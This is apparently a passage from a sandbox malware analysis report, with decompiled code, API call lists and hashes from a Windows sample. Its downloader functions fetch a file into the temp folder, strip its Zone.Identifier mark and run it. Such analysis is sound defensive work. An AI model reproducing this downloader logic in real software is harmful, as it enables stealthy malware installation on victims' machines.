                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E620(void* __esi) {
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t22 = __esi;
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                  				_t21 = _t23 + 0x244;
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                  						}
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}









                                                                                  0x0040e620
                                                                                  0x0040e622
                                                                                  0x0040e627
                                                                                  0x0040e630
                                                                                  0x0040e638
                                                                                  0x0040e687
                                                                                  0x0040e688
                                                                                  0x0040e693
                                                                                  0x0040e63a
                                                                                  0x0040e648
                                                                                  0x0040e659
                                                                                  0x0040e65c
                                                                                  0x0040e661
                                                                                  0x0040e663
                                                                                  0x0040e663
                                                                                  0x0040e668
                                                                                  0x0040e66f
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e679
                                                                                  0x0040e67f
                                                                                  0x00000000
                                                                                  0x0040e64a
                                                                                  0x0040e64d
                                                                                  0x0040e658
                                                                                  0x0040e658
                                                                                  0x0040e648

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);
                                                                                  					return E00408FB0(_a4);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}






                                                                                  0x0040c18a
                                                                                  0x0040c18f
                                                                                  0x0040c199
                                                                                  0x0040c19f
                                                                                  0x0040c1b1
                                                                                  0x0040c1be
                                                                                  0x0040c1c8
                                                                                  0x0040c1ae
                                                                                  0x0040c1ae
                                                                                  0x0040c1d7
                                                                                  0x0040c1e4
                                                                                  0x0040c1ed
                                                                                  0x0040c1f1
                                                                                  0x00000000
                                                                                  0x0040c202
                                                                                  0x0040c208

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}


















                                                                                  0x0040cfe6
                                                                                  0x0040cff5
                                                                                  0x0040cffa
                                                                                  0x0040cffd
                                                                                  0x0040d004
                                                                                  0x0040d00e
                                                                                  0x0040d013
                                                                                  0x0040d016
                                                                                  0x0040d01d
                                                                                  0x0040d023
                                                                                  0x0040d02d
                                                                                  0x0040d036
                                                                                  0x0040d041
                                                                                  0x0040d051
                                                                                  0x0040d05b
                                                                                  0x0040d064
                                                                                  0x0040d06c
                                                                                  0x0040d078
                                                                                  0x0040d07d
                                                                                  0x0040d080
                                                                                  0x0040d087
                                                                                  0x0040d08d
                                                                                  0x0040d092
                                                                                  0x0040d095
                                                                                  0x0040d09c
                                                                                  0x0040d0af
                                                                                  0x0040d0b4
                                                                                  0x0040d0bb
                                                                                  0x0040d0bb
                                                                                  0x0040d0c5
                                                                                  0x0040d0c5
                                                                                  0x0040d0d7
                                                                                  0x0040d0d7
                                                                                  0x0040d0e5
                                                                                  0x0040d0e5
                                                                                  0x0040d0f3
                                                                                  0x0040d0f3
                                                                                  0x0040d0f9
                                                                                  0x0040d0fe
                                                                                  0x0040d107

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_010D147C 3 Function_010D15FB 0->3 4 Function_010D15E6 0->4 7 Function_010D13E0 0->7 1 Function_010D15CE 2 Function_010D15F8 5 Function_010D1000 6 Function_010D1380 7->5 7->6 8 Function_010D10B0 7->8 8->5

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 78%
                                                                                  			E010D10B0(WCHAR* _a4) {
                                                                                  				void _v268;
                                                                                  				short _v788;
                                                                                  				signed int _v789;
                                                                                  				void* _v796;
                                                                                  				void* _v800;
                                                                                  				short _v1324;
                                                                                  				long _v1328;
                                                                                  				long _v1332;
                                                                                  				void* _v1336;
                                                                                  				short _v1860;
                                                                                  				signed int _t65;
                                                                                  				signed int _t68;
                                                                                  				signed int _t70;
                                                                                  				void* _t74;
                                                                                  				int _t75;
                                                                                  				signed int _t76;
                                                                                  				signed int _t78;
                                                                                  				signed int _t80;
                                                                                  				void* _t88;
                                                                                  				void* _t92;
                                                                                  				signed char _t101;
                                                                                  				void* _t145;
                                                                                  				void* _t147;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t65 = rand();
                                                                                  				asm("cdq");
                                                                                  				Sleep(0x2710 + _t65 % 0xea60 * 0xf); // executed
                                                                                  				_v789 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v788, 0x104);
                                                                                  				_t68 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t70 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t70 % 0x7530 + 0x2710, _t68 % 0x7530 + 0x2710);
                                                                                  				_t147 = _t145 + 0x18;
                                                                                  				_t74 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                  				_v1336 = _t74;
                                                                                  				if(_v1336 == 0) {
                                                                                  					L10:
                                                                                  					_t75 = InternetCloseHandle(_v1336);
                                                                                  					Sleep(0x1f4); // executed
                                                                                  					if((_v789 & 0x000000ff) != 0) {
                                                                                  						L13:
                                                                                  						return _t75;
                                                                                  					}
                                                                                  					_t76 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x2710 + _t76 % 0xea60 * 0xf); // executed
                                                                                  					_t78 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t80 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t75 = wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t80 % 0x7530 + 0x2710, _t78 % 0x7530 + 0x2710);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1860);
                                                                                  					_push(_a4);
                                                                                  					_push(0); // executed
                                                                                  					L010D160C(); // executed
                                                                                  					if(_t75 != 0) {
                                                                                  						goto L13;
                                                                                  					}
                                                                                  					wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                  					DeleteFileW( &_v1324);
                                                                                  					return E010D1000( &_v1860);
                                                                                  				}
                                                                                  				_t88 = InternetOpenUrlW(_v1336, _a4, 0, 0, 0, 0); // executed
                                                                                  				_v796 = _t88;
                                                                                  				if(_v796 == 0) {
                                                                                  					L9:
                                                                                  					InternetCloseHandle(_v796);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				_t92 = CreateFileW( &_v1860, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  				_v800 = _t92;
                                                                                  				if(_v800 == 0xffffffff) {
                                                                                  					L8:
                                                                                  					FindCloseChangeNotification(_v800); // executed
                                                                                  					goto L9;
                                                                                  				}
                                                                                  				while(InternetReadFile(_v796,  &_v268, 0x103,  &_v1332) != 0 && _v1332 != 0) {
                                                                                  					WriteFile(_v800,  &_v268, _v1332,  &_v1328, 0); // executed
                                                                                  				}
                                                                                  				FindCloseChangeNotification(_v800); // executed
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                  				DeleteFileW( &_v1324); // executed
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				_t101 = E010D1000( &_v1860); // executed
                                                                                  				_t147 = _t147 + 0x10;
                                                                                  				if((_t101 & 0x000000ff) == 1) {
                                                                                  					_v789 = 1;
                                                                                  				}
                                                                                  				goto L8;
                                                                                  			}


























                                                                                  0x010d10c0
                                                                                  0x010d10c8
                                                                                  0x010d10cd
                                                                                  0x010d10df
                                                                                  0x010d10e5
                                                                                  0x010d10fd
                                                                                  0x010d1103
                                                                                  0x010d1108
                                                                                  0x010d1117
                                                                                  0x010d111c
                                                                                  0x010d113e
                                                                                  0x010d1144
                                                                                  0x010d1154
                                                                                  0x010d115a
                                                                                  0x010d1167
                                                                                  0x010d129f
                                                                                  0x010d12a6
                                                                                  0x010d12b1
                                                                                  0x010d12c0
                                                                                  0x010d137c
                                                                                  0x010d137c
                                                                                  0x010d137c
                                                                                  0x010d12c6
                                                                                  0x010d12cb
                                                                                  0x010d12dd
                                                                                  0x010d12e3
                                                                                  0x010d12e8
                                                                                  0x010d12f7
                                                                                  0x010d12fc
                                                                                  0x010d131e
                                                                                  0x010d1327
                                                                                  0x010d1329
                                                                                  0x010d1331
                                                                                  0x010d1335
                                                                                  0x010d1336
                                                                                  0x010d1338
                                                                                  0x010d133f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x010d1354
                                                                                  0x010d1364
                                                                                  0x00000000
                                                                                  0x010d1376
                                                                                  0x010d1180
                                                                                  0x010d1186
                                                                                  0x010d1193
                                                                                  0x010d1292
                                                                                  0x010d1299
                                                                                  0x00000000
                                                                                  0x010d1299
                                                                                  0x010d11af
                                                                                  0x010d11b5
                                                                                  0x010d11c2
                                                                                  0x010d1285
                                                                                  0x010d128c
                                                                                  0x00000000
                                                                                  0x010d128c
                                                                                  0x010d11c8
                                                                                  0x010d1213
                                                                                  0x010d1213
                                                                                  0x010d1222
                                                                                  0x010d122d
                                                                                  0x010d1246
                                                                                  0x010d1256
                                                                                  0x010d1261
                                                                                  0x010d126e
                                                                                  0x010d1273
                                                                                  0x010d127c
                                                                                  0x010d127e
                                                                                  0x010d127e
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 010D10B9
                                                                                  • srand.MSVCRT ref: 010D10C0
                                                                                  • rand.MSVCRT ref: 010D10C8
                                                                                  • Sleep.KERNELBASE ref: 010D10DF
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 010D10FD
                                                                                  • rand.MSVCRT ref: 010D1103
                                                                                  • rand.MSVCRT ref: 010D1117
                                                                                  • wsprintfW.USER32 ref: 010D113E
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 010D1154
                                                                                  • InternetOpenUrlW.WININET(00000000,010D144E,00000000,00000000,00000000,00000000), ref: 010D1180
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010D11AF
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 010D11E2
                                                                                  • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 010D1213
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D1222
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 010D122D
                                                                                  • wsprintfW.USER32 ref: 010D1246
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 010D1256
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 010D1261
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D128C
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 010D1299
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 010D12A6
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010D12B1
                                                                                  • rand.MSVCRT ref: 010D12C6
                                                                                  • Sleep.KERNELBASE ref: 010D12DD
                                                                                  • rand.MSVCRT ref: 010D12E3
                                                                                  • rand.MSVCRT ref: 010D12F7
                                                                                  • wsprintfW.USER32 ref: 010D131E
                                                                                  • URLDownloadToFileW.URLMON(00000000,010D144E,?,00000000,00000000), ref: 010D1338
                                                                                  • wsprintfW.USER32 ref: 010D1354
                                                                                  • DeleteFileW.KERNEL32(?), ref: 010D1364
                                                                                  Strings
                                                                                  • %s\%d%d.exe, xrefs: 010D1312
                                                                                  • %temp%, xrefs: 010D10F8
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 010D114F
                                                                                  • %s:Zone.Identifier, xrefs: 010D123A
                                                                                  • %s:Zone.Identifier, xrefs: 010D1348
                                                                                  • %s\%d%d.exe, xrefs: 010D1132
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: Filerand$InternetSleep$Closewsprintf$ChangeDeleteFindHandleNotificationOpen$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                  • API String ID: 1334239748-1161929716
                                                                                  • Opcode ID: 61e8f4f88b43acc80aad3b9e8a9f7a323c3292f515a87cf144ff324fe98a87da
                                                                                  • Instruction ID: b516b25f129554e3e25ab3b52ba925cd08ad48ea8712a19649f2efc8849725c9
                                                                                  • Opcode Fuzzy Hash: 61e8f4f88b43acc80aad3b9e8a9f7a323c3292f515a87cf144ff324fe98a87da
                                                                                  • Instruction Fuzzy Hash: 4661E5B5941318ABE724D760DC49FEA7B7AAF48701F048498F68D960C5DF796B80CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 18 10d1000-10d1060 memset * 2 CreateProcessW 19 10d1071-10d1080 18->19 20 10d1062-10d106f Sleep 18->20 22 10d1088-10d1095 19->22 21 10d10a8-10d10ab 20->21 23 10d1097-10d10a4 Sleep 22->23 24 10d10a6 22->24 23->21 24->21
                                                                                  C-Code - Quality: 100%
                                                                                  			E010D1000(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				void* _v104;
                                                                                  				int _t18;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				memset( &_v24, 0, 0x10);
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t18 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                  				if(_t18 != 1) {
                                                                                  					_t20 = ShellExecuteW(0, L"open", _a4, 0, 0, 0); // executed
                                                                                  					_v8 = _t20;
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8);
                                                                                  				return 1;
                                                                                  			}









                                                                                  0x010d100e
                                                                                  0x010d101e
                                                                                  0x010d1026
                                                                                  0x010d102d
                                                                                  0x010d1039
                                                                                  0x010d1057
                                                                                  0x010d1060
                                                                                  0x010d1082
                                                                                  0x010d1088
                                                                                  0x010d108e
                                                                                  0x010d1095
                                                                                  0x00000000
                                                                                  0x010d10a6
                                                                                  0x010d109c
                                                                                  0x00000000
                                                                                  0x010d10a2
                                                                                  0x010d1067
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 010D100E
                                                                                  • memset.MSVCRT ref: 010D101E
                                                                                  • CreateProcessW.KERNELBASE ref: 010D1057
                                                                                  • Sleep.KERNEL32(000003E8), ref: 010D1067
                                                                                  • ShellExecuteW.SHELL32(00000000,open,010D145F,00000000,00000000,00000000), ref: 010D1082
                                                                                  • Sleep.KERNEL32(000003E8), ref: 010D109C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                  • String ID: $D$open$Ls
                                                                                  • API String ID: 3787208655-3818384318
                                                                                  • Opcode ID: 478f75f2dcd022377708cf99225ccc4b78aa366794cf307606eb5b67c5700cf7
                                                                                  • Instruction ID: 393954b8677e45deccdf0d080334f09c5272561adfd2ce1b6ff354151243b28c
                                                                                  • Opcode Fuzzy Hash: 478f75f2dcd022377708cf99225ccc4b78aa366794cf307606eb5b67c5700cf7
                                                                                  • Instruction Fuzzy Hash: F1112171A81308BBEB20DF90DD46FED7B79AB14B01F100115FA496E2C1DAF56A04C755
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                  				CHAR* _v8;
                                                                                  				intOrPtr* _v24;
                                                                                  				intOrPtr _v28;
